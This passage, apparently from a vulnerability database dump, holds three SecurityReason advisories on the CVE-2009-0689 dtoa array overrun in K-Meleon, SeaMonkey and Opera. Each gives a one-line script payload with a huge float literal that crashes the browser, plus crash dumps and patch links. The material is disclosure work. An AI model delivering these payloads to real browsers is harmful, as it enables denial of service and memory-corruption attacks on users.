sp3x\r\nhttp://SecurityReason.com\r\nDate:\r\n- - Dis.: 07.05.2009\r\n- - Pub.: 20.11.2009\r\n\r\nCVE: CVE-2009-0689\r\nRisk: High\r\nRemote: Yes\r\n\r\nAffected Software:\r\n- - K-Meleon 1.5.3\r\n\r\nNOTE: Prior versions may also be affected.\r\n\r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/72\r\n\r\n\r\n- --- 0.Description ---\r\nK-Meleon is an extremely fast, customizable, lightweight web browser based on the Gecko layout\r\nengine developed by Mozilla which is also used by Firefox. K-Meleon is free, open source software\r\nreleased under the GNU General Public License and is designed specifically for Microsoft Windows\r\n&#40;Win32&#41; operating systems.\r\n\r\n\r\n- --- 1. K-Meleon 1.5.3 Remote Array Overrun &#40;Arbitrary code execution&#41; ---\r\nThe main problem exist in dtoa implementation. K-Meleon has the same dtoa as a KDE, Opera and all\r\nBSD systems. This issue has been fixed in Firefox 3.5.4 and fix\r\n\r\nhttp://securityreason.com/achievement_securityalert/63\r\n\r\nbut fix for SREASONRES:20090625, used by openbsd was not good. \r\nMore information about fix for openbsd and similars SREASONRES:20091030, \r\n\r\nhttp://securityreason.com/achievement_securityalert/69\r\n\r\nWe can create any number of float, which will overwrite the memory. In Kmax has defined 15.\r\nFunctions in dtoa, don&#39;t checks Kmax limit, and it is possible to call 16&lt;= elements of freelist\r\narray.\r\n\r\n\r\n- --- 2. Proof of Concept &#40;PoC&#41; ---\r\n\r\n- -----------------------\r\n&lt;script&gt;\r\nvar a=0.&lt;?php echo str_repeat&#40;&quot;1&quot;,296450&#41;; ?&gt;;\r\n&lt;/script&gt;\r\n- -----------------------\r\n\r\nK-Meleon will crash with\r\n\r\nUnhandled exception at 0x01800754 in k-meleon.exe: 0xC0000005: Access violation reading location\r\n0x0bc576ec.\r\n\r\n01800754 mov eax,dword ptr [ecx] \r\n\r\nEAX 00000002 \r\nECX 0BC576EC \r\nEDI 028FEB51 \r\n\r\n\r\n- --- 3. SecurityReason Note ---\r\n\r\nOfficialy SREASONRES:20090625 has been detected in:\r\n- - OpenBSD\r\n- - NetBSD\r\n- - FreeBSD\r\n- - MacOSX\r\n- - Google Chrome\r\n- - Mozilla Firefox\r\n- - Mozilla Seamonkey\r\n- - KDE &#40;example: konqueror&#41;\r\n- - Opera\r\n- - K-Meleon\r\n\r\nThis list is not yet closed. US-CERT declared that will inform all vendors about this issue,\r\nhowever, they did not do it. Even greater confusion caused new CVE number &quot;CVE-2009-1563&quot;. Secunia\r\nhas informed that this vulnerability was only detected in Mozilla Firefox, but nobody was aware that\r\nthe problem affects other products like &#40; KDE, Chrome &#41; and it is based on &quot;CVE-2009-0689&quot;. After\r\nsome time Mozilla Foundation Security Advisory\r\n&#40;&quot;http://www.mozilla.org/security/announce/2009/mfsa2009-59.html&quot;&#41;\r\nwas updated with note :\r\n&quot;The underlying flaw in the dtoa routines used by Mozilla appears to be essentially the same as that\r\nreported against the libc gdtoa routine by Maksymilian Arciemowicz &#40; CVE-2009-0689&#41;&quot;.\r\nThis fact &#40; new CVE number for Firefox Vulnerability &#41;and PoC in javascript &#40;from Secunia&#41;, forced\r\nus to official notification all other vendors. We publish all the individual advisories, to formally\r\nshow all vulnerable software and to avoid wrong CVE number. We do not see any other way to fix this\r\nissue in all products.\r\n\r\nPlease note:\r\nPatch used in Firefox 3.5.4 does not fully solve the problem. Dtoa algorithm is not optimal and\r\nallows remote Denial of Service in Firefox 3.5.5 giving long float number.\r\n\r\n\r\n- --- 4. Fix ---\r\nNetBSD fix &#40;optimal&#41;:\r\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\r\n\r\nOpenBSD fix:\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c\r\n\r\n\r\n- --- 5. Credits ---\r\nDiscovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.\r\n\r\n\r\n- --- 6. Greets ---\r\nInfospec p_e_a pi3\r\n\r\n\r\n- --- 7. Contact ---\r\nEmail: \r\n- - cxib {a.t] securityreason [d0t} com\r\n- - sp3x {a.t] securityreason [d0t} com \r\n\r\nGPG: \r\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\n- - http://securityreason.com/key/sp3x.gpg\r\n\r\nhttp://securityreason.com/\r\nhttp://securityreason.pl/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\n\r\niEYEARECAAYFAksF2NoACgkQpiCeOKaYa9ZidgCfUul3XpJA9x7xjTmAJTxCa/XU\r\nhiAAoIiVchZUxMkFgHEgXicv+UwhNaz0\r\n=bAay\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2009-11-20T00:00:00", "published": "2009-11-20T00:00:00", "id": "SECURITYVULNS:DOC:22816", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22816", "title": "K-Meleon 1.5.3 Remote Array Overrun &#40;Arbitrary code execution&#41;", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:32", "bulletinFamily": "software", "cvelist": ["CVE-2009-1563", "CVE-2009-0689"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n[ SeaMonkey 1.1.8 Remote Array Overrun &#40;Arbitrary code execution&#41; ]\r\n\r\nAuthor: Maksymilian Arciemowicz and sp3x\r\nhttp://SecurityReason.com\r\nDate:\r\n- - Dis.: 07.05.2009\r\n- - Pub.: 20.11.2009\r\n\r\nCVE: CVE-2009-0689\r\nRisk: High\r\nRemote: Yes\r\n\r\nAffected Software:\r\n- - SeaMonkey 1.1.18\r\n\r\nFixed in:\r\n- - SeaMonkey 2.0\r\n\r\nNOTE: Prior versions may also be affected.\r\n\r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/71\r\n\r\n\r\n- --- 0.Description ---\r\nThe SeaMonkey project is a community effort to develop the SeaMonkey all-in-one internet application\r\nsuite &#40;see below&#41;. Such a software suite was previously made popular by Netscape and Mozilla, and the\r\nSeaMonkey project continues to develop and deliver high-quality updates to this concept. Containing\r\nan Internet browser, email &amp; newsgroup client with an included web feed reader, HTML editor, IRC chat\r\nand web development tools, SeaMonkey is sure to appeal to advanced users, web developers and\r\ncorporate users.\r\n\r\n\r\n- --- 1. SeaMonkey 1.1.18 Remote Array Overrun &#40;Arbitrary code execution&#41; ---\r\nThe main problem exist in dtoa implementation. SeaMonkey has the same dtoa as a KDE, Opera and all\r\nBSD systems. This issue has been fixed in Firefox 3.5.4 and fix\r\n\r\nhttp://bonsai.mozilla.org/cvsview2.cgi?diff_mode=context&amp;whitespace_mode=show&amp;file=jsdtoa.c&amp;branch=&amp;root=/cvsroot&amp;subdir=mozilla/js/src&amp;command=DIFF_FRAMESET&amp;rev1=3.41&amp;rev2=3.42\r\n\r\nhas been used to patch SeaMonkey 2.0.\r\n\r\nThis flaw has been detected in may 2009 and signed SREASONRES:20090625.\r\n\r\nhttp://securityreason.com/achievement_securityalert/63\r\n\r\nbut fix for SREASONRES:20090625, used by openbsd was not good. \r\nMore information about fix for openbsd and similars SREASONRES:20091030, \r\n\r\nhttp://securityreason.com/achievement_securityalert/69\r\n\r\nWe can create any number of float, which will overwrite the memory. In Kmax has defined 15.\r\nFunctions in dtoa, don&#39;t checks Kmax limit, and it is possible to call 16&lt;= elements of freelist\r\narray.\r\n\r\n\r\n- --- 2. Proof of Concept &#40;PoC&#41; ---\r\n\r\n- -----------------------\r\n&lt;script&gt;\r\nvar a=0.&lt;?php echo str_repeat&#40;&quot;9&quot;,299999&#41;; ?&gt;;\r\n&lt;/script&gt;\r\n- -----------------------\r\n\r\nIf we use SeaMonkey to see this PoC, SeaMonkey will crash. For example\r\n\r\n- -----------------------\r\n&lt;script&gt;\r\nvar a=0.&lt;?php echo str_repeat&#40;&quot;1&quot;,296450&#41;; ?&gt;;\r\n&lt;/script&gt;\r\n- -----------------------\r\n\r\n127# gdb seamonkey-bin seamonkey-bin.core\r\n...\r\n#0 0x28df0ecb in ?? &#40;&#41;\r\n...\r\n&#40;gdb&#41; i r\r\neax 0x0 0\r\necx 0x2 2\r\nedx 0xbfbfd2fc -1077947652\r\nebx 0x28da9b6c 685415276\r\nesp 0xbfbfd2ac 0xbfbfd2ac\r\nebp 0xbfbfd2c8 0xbfbfd2c8\r\nesi 0xb 11\r\nedi 0xb 11\r\neip 0x28df0ecb 0x28df0ecb\r\n...\r\n\r\nesi = esi = 11\r\n\r\n\r\n- --- 3. SecurityReason Note ---\r\n\r\nOfficialy SREASONRES:20090625 has been detected in:\r\n- - OpenBSD\r\n- - NetBSD\r\n- - FreeBSD\r\n- - MacOSX\r\n- - Google Chrome\r\n- - Mozilla Firefox\r\n- - Mozilla Seamonkey\r\n- - KDE &#40;example: konqueror&#41;\r\n- - Opera\r\n- - K-Meleon\r\n\r\nThis list is not yet closed. US-CERT declared that will inform all vendors about this issue,\r\nhowever, they did not do it. Even greater confusion caused new CVE number &quot;CVE-2009-1563&quot;. Secunia\r\nhas informed that this vulnerability was only detected in Mozilla Firefox, but nobody was aware that\r\nthe problem affects other products like &#40; KDE, Chrome &#41; and it is based on &quot;CVE-2009-0689&quot;. After\r\nsome time Mozilla Foundation Security Advisory\r\n&#40;&quot;http://www.mozilla.org/security/announce/2009/mfsa2009-59.html&quot;&#41;\r\nwas updated with note :\r\n&quot;The underlying flaw in the dtoa routines used by Mozilla appears to be essentially the same as that\r\nreported against the libc gdtoa routine by Maksymilian Arciemowicz &#40; CVE-2009-0689&#41;&quot;.\r\nThis fact &#40; new CVE number for Firefox Vulnerability &#41;and PoC in javascript &#40;from Secunia&#41;, forced\r\nus to official notification all other vendors. We publish all the individual advisories, to formally\r\nshow all vulnerable software and to avoid wrong CVE number. We do not see any other way to fix this\r\nissue in all products.\r\n\r\nPlease note:\r\nPatch used in Firefox 3.5.4 does not fully solve the problem. Dtoa algorithm is not optimal and\r\nallows remote Denial of Service in Firefox 3.5.5 giving long float number.\r\n\r\n\r\n- --- 4. Fix ---\r\nNetBSD fix &#40;optimal&#41;:\r\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\r\n\r\nOpenBSD fix:\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c\r\n\r\n\r\n- --- 5. Credits ---\r\nDiscovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.\r\n\r\n\r\n- --- 6. Greets ---\r\nInfospec p_e_a pi3\r\n\r\n\r\n- --- 7. Contact ---\r\nEmail: \r\n- - cxib {a.t] securityreason [d0t} com\r\n- - sp3x {a.t] securityreason [d0t} com \r\n\r\nGPG: \r\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\n- - http://securityreason.com/key/sp3x.gpg\r\n\r\nhttp://securityreason.com/\r\nhttp://securityreason.pl/\r\n-----BEGIN PGP SIGNATURE-----\r\n\r\niEYEARECAAYFAksF2IQACgkQpiCeOKaYa9Z2vgCgvqQwFzfwqYsBNbL2To29/o6D\r\nZBgAn0bwlhNtD89nVWtxI2Qf0UA7/ZqB\r\n=JY6k\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2009-11-20T00:00:00", "published": "2009-11-20T00:00:00", "id": "SECURITYVULNS:DOC:22813", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22813", "title": "SeaMonkey 1.1.8 Remote Array Overrun &#40;Arbitrary code execution&#41;", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:32", "bulletinFamily": "software", "cvelist": ["CVE-2009-1563", "CVE-2009-0689"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n[ Opera 10.01 Remote Array Overrun &#40;Arbitrary code execution&#41; ]\r\n\r\nAuthor: Maksymilian Arciemowicz and sp3x\r\nhttp://SecurityReason.com\r\nDate:\r\n- - Dis.: 07.05.2009\r\n- - Pub.: 20.11.2009\r\n\r\nCVE: CVE-2009-0689\r\nRisk: High\r\nRemote: Yes\r\n\r\nAffected Software:\r\n- - Opera 10.01\r\n- - Opera 10.10 Beta\r\n\r\nNOTE: Prior versions may also be affected.\r\n\r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/73\r\n\r\n\r\n- --- 0.Description ---\r\nOpera is a Web browser and Internet suite developed by the Opera Software company. The browser\r\nhandles common Internet-related tasks such as displaying Web sites, sending and receiving e-mail\r\nmessages, managing contacts, IRC online chatting, downloading files via BitTorrent, and reading Web\r\nfeeds. Opera is offered free of charge for personal computers and mobile phones.\r\n\r\n\r\n- --- 1. Opera 10.01 Remote Array Overrun &#40;Arbitrary code execution&#41; ---\r\nThe main problem exist in dtoa implementation. Opera has a very similar dtoa algorithm to the BSD,\r\nChrome and Mozilla products. It is the same issue like SREASONRES:20090625.\r\n\r\nhttp://securityreason.com/achievement_securityalert/63\r\n\r\nbut fix for SREASONRES:20090625, used by openbsd was not good. \r\nMore information about fix for openbsd and similars SREASONRES:20091030, \r\n\r\nhttp://securityreason.com/achievement_securityalert/69\r\n\r\nWe can create any number of float, which will overwrite the memory. In Kmax has defined 15.\r\nFunctions in dtoa, don&#39;t checks Kmax limit, and it is possible to call 16&lt;= elements of freelist\r\narray.\r\n\r\n\r\n- --- 2. Proof of Concept &#40;PoC&#41; ---\r\n\r\n- -----------------------\r\n&lt;script&gt;\r\nvar a=0.&lt;?php echo str_repeat&#40;&quot;9&quot;,299999&#41;; ?&gt;;\r\n&lt;/script&gt;\r\n- -----------------------\r\n\r\nIf we use Opera to see this PoC, Opera will crash. For example\r\n\r\n- -----------------------\r\n&lt;script&gt;\r\nvar a=0.&lt;?php echo str_repeat&#40;&quot;1&quot;,296450&#41;; ?&gt;;\r\n&lt;/script&gt;\r\n- -----------------------\r\n\r\nOPERA-CRASHLOG V1 desktop 10.01 1844 windows\r\nOpera.exe 1844 caused exception C0000005 at address 67956906 &#40;Base: 400000&#41;\r\n\r\nRegisters:\r\nEAX=01165C40 EBX=0592064C ECX=A0D589D4 EDX=42000000 ESI=C20471EC\r\nEDI=00000000 EBP=0012E384 ESP=0012E2FC EIP=67956906 FLAGS=00010202\r\nCS=001B DS=0023 SS=0023 ES=0023 FS=003B GS=0000\r\nFPU stack:\r\nC020A38F66534266F000 C020A38F66534266F000 3FFBE38E38E38E38D800\r\n3FC78000000000000000 10000000000100000000 0BBE0000000000040000\r\n00000000000000000000 2EBA804E2FDE00000000 SW=0122 CW=027F\r\n\r\n127# gdb -q opera opera.core\r\n...\r\nProgram terminated with signal 11, Segmentation fault.\r\n#0 0x2960307b in ?? &#40;&#41;\r\n...\r\n&#40;gdb&#41; i r\r\neax 0x71c71c71 1908874353\r\necx 0x2aa03be4 715144164\r\nedx 0x0 0\r\nebx 0x296177f8 694253560\r\nesp 0xbfbfb650 0xbfbfb650\r\nebp 0xbfbfb698 0xbfbfb698\r\nesi 0x2962d000 694341632\r\nedi 0x0 0\r\neip 0x2960307b 0x2960307b\r\n...\r\n&#40;gdb&#41; x/100x &#40;$esi&#41;-90\r\n0x2962cfa6: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71\r\n0x2962cfb6: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c\r\n0x2962cfc6: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7\r\n0x2962cfd6: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71\r\n0x2962cfe6: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c\r\n0x2962cff6: 0xc71c71c7 0x71c71c71 Cannot access memory at address 0x2962cffe\r\n...\r\n\r\n\r\n- --- 3. SecurityReason Note ---\r\n\r\nOfficialy SREASONRES:20090625 has been detected in:\r\n- - OpenBSD\r\n- - NetBSD\r\n- - FreeBSD\r\n- - MacOSX\r\n- - Google Chrome\r\n- - Mozilla Firefox\r\n- - Mozilla Seamonkey\r\n- - KDE &#40;example: konqueror&#41;\r\n- - Opera\r\n- - K-Meleon\r\n\r\nThis list is not yet closed. US-CERT declared that will inform all vendors about this issue,\r\nhowever, they did not do it. Even greater confusion caused new CVE number &quot;CVE-2009-1563&quot;. Secunia\r\nhas informed that this vulnerability was only detected in Mozilla Firefox, but nobody was aware that\r\nthe problem affects other products like &#40; KDE, Chrome &#41; and it is based on &quot;CVE-2009-0689&quot;. After\r\nsome time Mozilla Foundation Security Advisory\r\n&#40;&quot;http://www.mozilla.org/security/announce/2009/mfsa2009-59.html&quot;&#41;\r\nwas updated with note :\r\n&quot;The underlying flaw in the dtoa routines used by Mozilla appears to be essentially the same as that\r\nreported against the libc gdtoa routine by Maksymilian Arciemowicz &#40; CVE-2009-0689&#41;&quot;.\r\nThis fact &#40; new CVE number for Firefox Vulnerability &#41;and PoC in javascript &#40;from Secunia&#41;, forced\r\nus to official notification all other vendors. We publish all the individual advisories, to formally\r\nshow all vulnerable software and to avoid wrong CVE number. We do not see any other way to fix this\r\nissue in all products.\r\n\r\n\r\n- --- 4. Fix ---\r\nOpera fix:\r\nThe vulnerability was fixed in the latest release candidate Opera RC3 :\r\nhttp://snapshot.opera.com/windows/Opera_1010_1890_in.exe\r\nIn shortly time we can expect the final verion of Opera with the fix. \r\n\r\nNetBSD fix &#40;optimal&#41;:\r\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\r\n\r\nOpenBSD fix:\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/st